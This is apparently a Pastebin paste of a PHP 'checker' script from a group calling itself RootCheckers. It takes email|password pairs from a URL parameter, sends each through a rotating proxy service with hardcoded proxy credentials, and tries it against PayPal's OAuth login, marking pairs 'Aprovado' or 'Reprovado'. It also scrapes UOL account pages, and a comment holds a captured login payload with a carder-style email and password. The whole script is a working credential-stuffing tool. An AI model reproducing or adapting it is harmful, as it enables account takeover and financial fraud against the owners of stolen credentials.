Advertisement
Guest User

Untitled

a guest
Mar 24th, 2019
169
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.73 KB | None | 0 0
  1. <?php
  2. set_time_limit(0);
  3. error_reporting(0);
  4.  
  5.  
  6. class cURL {
  7. var $callback = false;
  8. function setCallback($func_name) {
  9. $this->callback = $func_name;
  10. }
  11. function doRequest($method, $url, $vars) {
  12. $ch = curl_init();
  13. $username = 'lum-customer-hl_16e3e410-zone-static';
  14. $password = 'mm5i9he0a3ed';
  15. $port = 22225;
  16. $session = mt_rand();
  17. $super_proxy = 'zproxy.lum-superproxy.io';
  18. curl_setopt($ch, CURLOPT_URL, $url);
  19. curl_setopt($ch, CURLOPT_HEADER, 0);
  20. curl_setopt($ch, CURLOPT_NOBODY, 0);
  21. curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
  22. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  23. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  24. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  25. curl_setopt($ch, CURLOPT_PROXY, "http://$super_proxy:$port");
  26. curl_setopt($ch, CURLOPT_PROXYUSERPWD, "$username-country-br-session-$session:$password");
  27. curl_setopt($ch, CURLOPT_HTTPHEADER, arraY("Accept: application/json, text/javascript, */*; q=0.01", "Content-Type: application/x-www-form-urlencoded; charset=UTF-8", "Authorization: HermitPauzudo.txt.py.virus.hack.fimose.com"));
  28. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  29. curl_setopt($ch, CURLOPT_TIMEOUT, 200);
  30. curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
  31. curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
  32. curl_setopt($ch, CURLOPT_VERBOSE, 1);
  33. if ($method == 'POST') {
  34. curl_setopt($ch, CURLOPT_POST, 1);
  35. curl_setopt($ch, CURLOPT_POSTFIELDS, $vars);
  36. }
  37. $data = curl_exec($ch);
  38. // echo $data;
  39. curl_close($ch);
  40.  
  41. if ($data) {
  42. if ($this->callback) {
  43. $callback = $this->callback;
  44. $this->callback = false;
  45. return call_user_func($callback, $data);
  46. } else {
  47. return $data;
  48. }
  49. } else {
  50. return curl_error($ch);
  51. }
  52. }
  53. function get($url) {
  54. return $this->doRequest('GET', $url, 'NULL');
  55. }
  56. function post($url, $vars) {
  57. return $this->doRequest('POST', $url, $vars);
  58. }
  59. }
  60.  
  61. function GetStr($string,$start,$end){
  62. $str = explode($start, $string);
  63. $str = explode($end, $str[1]);
  64. return $str[0];
  65. }
  66.  
  67.  
  68. $linha = $_GET["linha"];
  69. $email = explode("|", $linha)[0];
  70. $senha = explode("|", $linha)[1];
  71.  
  72. /* switch ($ano) {
  73. case '2017':
  74. $ano = '17';
  75. break;
  76. case '2018':
  77. $ano = '18';
  78. break;
  79.  
  80. case '2019':
  81. $ano = '19';
  82. break;
  83. case '2020':
  84. $ano = '20';
  85. break;
  86. case '2021':
  87. $ano = '21';
  88. break;
  89. case '2022':
  90. $ano = '22';
  91. break;
  92.  
  93. case '2023':
  94. $ano = '23';
  95. break;
  96. case '2025':
  97. $ano = '25';
  98. break;
  99. case '2026':
  100. $ano = '26';
  101. break;
  102.  
  103.  
  104. YII_CSRF_TOKEN=386bdfaa2fbdaeaa294d3a2ede24600e06f93bf1&LoginForm%5Bemail%5D=playboycarder%40yopmail.com&LoginForm%5Bpassword%5D=playboy921&ajax=login-form&undefined=loginbutton
  105. } */
  106.  
  107.  
  108. $nc = new cURL();
  109. $getoken = $nc->get('painel.uol.com.br/acesso.html?nextPage=http://painel.uol.com.br/myProducts.html');
  110. $skin = GetStr($getoken,' <input type="hidden" name="skin" value="','"');
  111. $dest = GetStr($getoken,' <input type="hidden" name="dest" value="','"');
  112. $deviceid = GetStr($getoken,'<input type="hidden" name="deviceId" value="','"');
  113.  
  114.  
  115. $a = new cURL();
  116. $b = $a->post('https://api.paypal.com/v1/oauth2/login', 'email='.$email.'&password='.$senha.'&grant_type=password&redirect_uri=urn%3Aietf%3Awg%3Aoauth%3A2.0%3Aoob&response_type=access_token&scope=https%3A%2F%2Fapi.paypal.com%2Fv1%2Fvault%2F.*');
  117.  
  118. $getscurl = new cURL();
  119. $getss = $getscurl->get('https://sac.uol.com.br/#/wrapper?url=https:%2F%2Fsac.uol.com.br%2Fusuario%2Fdados_pessoais.html');
  120. if (file_exists(getcwd().'/cookie.txt')) {
  121. unlink(getcwd().'/cookie.txt');
  122. }
  123. $saldo = GetStr($getss, 'for="namIndividual">Nome:</label></dt>','<input');
  124. $sla = GetStr($getss, '<td class="cell red-text"><i>','</i></td>');
  125. $exp = GetStr($getss, '<td class="cell">','</td>');
  126. $status = GetStr($getss, '<td class="cell">','<i');
  127.  
  128.  
  129.  
  130. if (strpos($b, 'access_token')) {
  131.  
  132. echo "";
  133. echo "<embed src='Gravação.mp3' width='1' height='1'>";
  134. echo "Status: #Aprovado - Email: $email - Senha: $senha - [RootCheckers]";
  135.  
  136.  
  137.  
  138.  
  139. }else{
  140.  
  141. echo "#Reprovado $email|$senha [RootCheckers] ";
  142.  
  143.  
  144.  
  145.  
  146.  
  147. }
  148.  
  149.  
  150.  
  151. ?>
  152.  
  153. </body>
  154. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement